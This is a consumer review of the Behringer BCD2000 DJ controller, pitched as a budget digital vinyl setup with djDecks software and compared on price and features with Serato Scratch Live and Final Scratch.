A Serato Scratch Live setup will cost you around $480. The latest Final Scratch weighs in at $100 less on a good day. Final Scratch 1.0, which many purists prefer for its Linux-based software, can be had for less than $200. However, a Behringer BCD2000 can be had on eBay for only $100.

There is no sense in paying twice or three times as much for a USB sound card which does not offer a fraction of the functionality of the BCD2000. The BCD2000 is not only a USB sound card (channels: 2 input, 1 output, 1 headphone, 1 microphone,) but also a mixer and a MIDI controller. By itself, the BCD2000 is a powerful tool for use with Traktor, Ableton Live, or other software of your choice. Remember to add two $10 Serato Scratch Live vinyls and $50 for a license for the unpirateable djDecks software. Rounding upwards to include shipping, you have a powerful digital vinyl setup for $200 that puts the competition to shame.

Other reviews of the BCD2000 will tell you that its plastic build and light weight may be discouraging. It does feel like a quality-made product, but it is not particularly sturdy. Though it will accept being carted from a mate’s tag session to the occasional house party and back to your studio, it is not a DJM-600 and it should not be treated like one. The crossfader has little weight behind it and should not be slammed. It is often hard to tell when the knobs are zeroed, as there is only a slight click at zero and they are a plain plastic black with no highlights in the middle of the knob. These nitpicks are nullified by the laptop you will be using for track selection, as it will be displaying your equalizer as well. It is possible to connect any analog mixer to the BCD2000 so you can play rough, though you will have to creatively route the left channel to the master output and the right channel to the headphone output before inputting them into your analog mixer. Keep in mind that this will limit your desk real estate and increase cabling entanglement.

The aforementioned djDecks software is excellent. It allows MP3 transcoding using Final Scratch, MsPinky, VirtualDJ, Serato Scratch Live and Traktor Scratch records. All the features of the Serato software are available, plus much more: 3-band equalizer, echos and loops, and 2 simultaneous VST effects per deck. The BCD2000 has enough spare buttons to properly control the djDecks software without touching your laptop. Buttons can be assigned to control a simultaneous session of Ableton Live or Traktor, though I’d recommend a hefty laptop with a 2 ghz CPU and 1 gig of RAM.

Recent updates have made the software essentially bulletproof. Install Windows, install BCD2000 drivers, install djDecks, play. The BCD2000 drivers have a history of instability on lower-end laptops, which may require disabling the WiFi card, DVD drive, and further tweaking.  Behringer may not be best known for the quality and reliability of their entry-level analog mixers, but this product has been out for over a year and is considered solid, as is the rest of their BCD line.

The BCD3000 is now available, though it is essentially a Mac-friendly BCD2000 in an oreo color scheme and not worth paying twice as much.